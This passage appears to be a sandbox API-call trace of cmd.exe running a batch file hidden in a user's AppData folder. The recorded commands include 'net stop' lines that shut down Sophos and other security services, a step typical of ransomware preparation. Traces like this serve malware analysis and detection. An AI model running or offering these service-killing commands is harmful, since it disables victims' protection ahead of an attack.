(penv=0x3f8408) returned 1 [0199.179] GetProcessHeap () returned 0x3e0000 [0199.179] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0199.179] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0199.179] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.179] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0199.179] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.179] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0199.180] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.180] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0199.180] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.180] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0199.180] SetConsoleInputExeNameW () returned 0x1 [0199.180] GetConsoleOutputCP () returned 0x1b5 [0199.180] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0199.180] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.180] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.181] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.181] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.181] SetFilePointer (in: hFile=0x78, lDistanceToMove=2836, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb14 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0199.181] GetProcessHeap () returned 0x3e0000 [0199.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0199.181] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.182] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb14 [0199.182] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xdad, lpOverlapped=0x0) returned 1 [0199.182] SetFilePointer (in: hFile=0x78, lDistanceToMove=2863, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb2f [0199.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop swi_update_64 /y\r\nrviceΓÇ¥ /y\r\n\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 27 [0199.182] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.182] GetFileType (hFile=0x78) returned 0x1 [0199.182] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.182] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2f [0199.182] GetProcessHeap () returned 0x3e0000 [0199.182] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0199.182] GetProcessHeap () returned 0x3e0000 [0199.182] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0199.186] _tell (_FileHandle=3) returned 2863 [0199.186] _close (_FileHandle=3) returned 0 [0199.186] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0199.186] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0199.186] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0199.186] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0199.186] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0199.186] _wcsicmp (_String1="net", _String2="CD") returned 11 [0199.186] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0199.186] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0199.186] _wcsicmp (_String1="net", _String2="REN") returned -4 [0199.186] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0199.186] _wcsicmp (_String1="net", _String2="SET") returned -5 [0199.186] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0199.186] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0199.186] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0199.186] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0199.186] _wcsicmp (_String1="net", _String2="MD") returned 1 [0199.186] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0199.186] _wcsicmp (_String1="net", _String2="RD") returned -4 [0199.186] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0199.186] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0199.186] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0199.186] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0199.186] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0199.186] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0199.186] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0199.186] _wcsicmp (_String1="net", _String2="VER") returned -8 [0199.186] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0199.186] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0199.186] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0199.186] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0199.186] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0199.186] _wcsicmp (_String1="net", _String2="START") returned -5 [0199.186] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0199.187] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0199.187] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0199.187] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0199.187] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0199.187] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0199.187] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0199.187] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0199.187] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0199.187] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0199.187] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0199.187] SetErrorMode (uMode=0x0) returned 0x1 [0199.187] GetProcessHeap () returned 0x3e0000 [0199.188] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0199.188] GetProcessHeap () returned 0x3e0000 [0199.188] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0199.188] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.188] GetProcessHeap () returned 0x3e0000 [0199.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0199.188] GetProcessHeap () returned 0x3e0000 [0199.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0199.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.189] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.189] GetLastError () returned 0x2 [0199.189] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.189] GetLastError () returned 0x2 [0199.190] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.190] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.190] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.191] GetLastError () returned 0x2 [0199.191] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.191] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.191] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.192] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0199.192] SetErrorMode (uMode=0x0) returned 0x1 [0199.192] GetProcessHeap () returned 0x3e0000 [0199.192] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0199.192] GetProcessHeap () returned 0x3e0000 [0199.192] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0199.193] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.193] GetProcessHeap () returned 0x3e0000 [0199.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.193] GetProcessHeap () returned 0x3e0000 [0199.193] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.193] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.194] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.194] GetLastError () returned 0x2 [0199.194] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.194] GetLastError () returned 0x2 [0199.195] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.195] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.195] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.195] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.196] GetLastError () returned 0x2 [0199.196] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.196] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.196] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.196] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.197] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.197] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.197] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.197] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop swi_update_64 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop swi_update_64 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop swi_update_64 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x360, dwThreadId=0x38c)) returned 1 [0199.201] CloseHandle (hObject=0x78) returned 1 [0199.201] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.201] GetProcessHeap () returned 0x3e0000 [0199.201] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.201] GetEnvironmentStringsW () returned 0x3f8408* [0199.201] GetProcessHeap () returned 0x3e0000 [0199.201] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.201] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.201] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0199.361] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0199.361] CloseHandle (hObject=0x74) returned 1 [0199.361] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0199.361] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0199.363] GetProcessHeap () returned 0x3e0000 [0199.363] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.364] GetEnvironmentStringsW () returned 0x3f8408* [0199.364] GetProcessHeap () returned 0x3e0000 [0199.365] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.366] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.368] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.368] GetProcessHeap () returned 0x3e0000 [0199.368] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.368] GetEnvironmentStringsW () returned 0x3f8408* [0199.368] GetProcessHeap () returned 0x3e0000 [0199.368] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.369] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.369] GetProcessHeap () returned 0x3e0000 [0199.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0199.369] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0199.369] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.369] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0199.369] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.369] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0199.369] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.369] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0199.370] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.370] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0199.370] SetConsoleInputExeNameW () returned 0x1 [0199.370] GetConsoleOutputCP () returned 0x1b5 [0199.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0199.370] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0199.371] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0199.371] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.371] SetFilePointer (in: hFile=0x74, lDistanceToMove=2863, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb2f [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0199.371] GetProcessHeap () returned 0x3e0000 [0199.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0199.371] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.371] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2f [0199.371] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xd92, lpOverlapped=0x0) returned 1 [0199.372] SetFilePointer (in: hFile=0x74, lDistanceToMove=2909, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb5d [0199.372] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=46, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y\r\n¥ /y\r\nlures\r\nnded\r\n") returned 46 [0199.373] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.373] GetFileType (hFile=0x74) returned 0x1 [0199.373] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.373] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb5d [0199.373] GetProcessHeap () returned 0x3e0000 [0199.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0199.373] GetProcessHeap () returned 0x3e0000 [0199.373] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0199.376] _tell (_FileHandle=3) returned 2909 [0199.376] _close (_FileHandle=3) returned 0 [0199.376] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0199.376] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0199.376] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0199.377] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0199.377] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0199.377] _wcsicmp (_String1="net", _String2="CD") returned 11 [0199.377] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0199.377] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0199.377] _wcsicmp (_String1="net", _String2="REN") returned -4 [0199.377] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0199.377] _wcsicmp (_String1="net", _String2="SET") returned -5 [0199.377] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0199.377] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0199.377] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0199.377] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0199.377] _wcsicmp (_String1="net", _String2="MD") returned 1 [0199.377] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0199.377] _wcsicmp (_String1="net", _String2="RD") returned -4 [0199.377] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0199.377] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0199.377] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0199.377] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0199.377] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0199.377] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0199.377] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0199.377] _wcsicmp (_String1="net", _String2="VER") returned -8 [0199.377] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0199.377] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0199.377] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0199.377] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0199.377] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0199.377] _wcsicmp (_String1="net", _String2="START") returned -5 [0199.377] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0199.377] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0199.377] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0199.377] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0199.377] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0199.377] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0199.377] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0199.377] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0199.378] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0199.378] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0199.378] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0199.378] SetErrorMode (uMode=0x0) returned 0x1 [0199.378] GetProcessHeap () returned 0x3e0000 [0199.378] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) 